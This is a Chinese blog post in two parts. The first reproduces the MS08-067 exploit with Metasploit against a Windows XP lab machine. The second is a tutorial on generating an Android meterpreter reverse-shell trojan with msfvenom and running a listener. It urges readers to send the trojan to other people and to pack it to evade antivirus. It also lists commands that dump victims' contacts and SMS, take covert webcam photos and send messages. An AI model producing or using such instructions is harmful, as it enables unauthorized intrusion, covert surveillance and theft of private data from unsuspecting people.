时间:2022-03-10
一、环境准备
1、需要准备英文的windows xp 环境。
链接: https://pan.baidu.com/s/1iN6hxbAlRHCaxPXaBiB4_g
提取码:y8mj
2、攻击工具使用的是metasploit,kali 自带。
二、复现时存在的问题
1、安装完xp之后,我自己已经复现了一次,发现拿到的system没有相关命令,可能是这个新系统没有添加到环境中,之后建立了一个文档进行读取,也可直观的看到结果。其他就没遇到什么问题了。
三、复现演示
1、虚拟机准备一下xp,建立一个test的文档,查看一下靶机 IP,靶机建立完成
2、使用metasploit 进行攻击
1)、msfconsole #进入metasploit
2)、search ms08-067 #搜索相关exp
3)、use exploit/windows/smb/ms08_067_netapi #使用这个exp
4)、show payloads #搜索相关payload,能让攻击后建立连接
5)、set payload generic/shell_bind_tcp #我使用的是这个
6)、set RHOST 192.168.154.144 #设置靶机IP,让它攻击这个IP,端口默认是445,这个就不需要设置了
7)、show options #可以用这个命令查看是否把相关配置设置全了
8)、run 或 exploit #进行攻击,两个命令都可以
9)、type test.txt #之后攻击成功了,使用windows命令 就可以去相关路径下查看那个 test 文档了
演示图:
众所周知,msf是大家公认的神器!现在我就来说说到底怎么用msf呢
有很多人说,他们不会安装msfconsole
教程:
http://bbs.huluxia.com/wap/thread/829605.html?para=37Hftt%2B137bfsd%2B037Xfst%2B03p%2FfuN%2By37nftt%2Bw37U%3D%0A&product=tool
安装了msfconsole之后,在termux输入:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=5555 R >/sdcard/mu.apk
其中
LHOST= 后面的数字是本地的ip,不是被攻击者的ip而是你自己的
LPORT= 是端口,高端口不容易被报毒,如果你不知道端口是什么那就不要改了
生成的木马在根目录的mu.apk(啰嗦)
那么接下来,我来教大家怎么监听吧
1.启动msfconsole(漫长):msfconsole
2.使用multi模块:use exploit/multi/handler
3.设置LHOST(跟木马的一样):set LHOST 192.168.2.117
4.设置LPORT(一样的):set LPORT 5555
5.设置payload:set payload android/meterpreter/reverse_tcp
6.启动监听:exploit
最后将木马发给别人就行啦
很多人说一看就知道是木马了!
在这里我说一句,你不会加个壳嘛?
ok!当鱼上吊的时候,会反dshell
命令:
dump_contacts 导出电话
dump_sms 导出信息
webcam_list 列出摄像头
webcam_stream 开启摄像
webcam_snap 偷拍一张照片
webcam_chat 视频通话
ps 列出所有进程
activity_start 启动其它应用
check_root 检查是否root
send_sms 发送指定信息
全部手机进行,免root进行
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)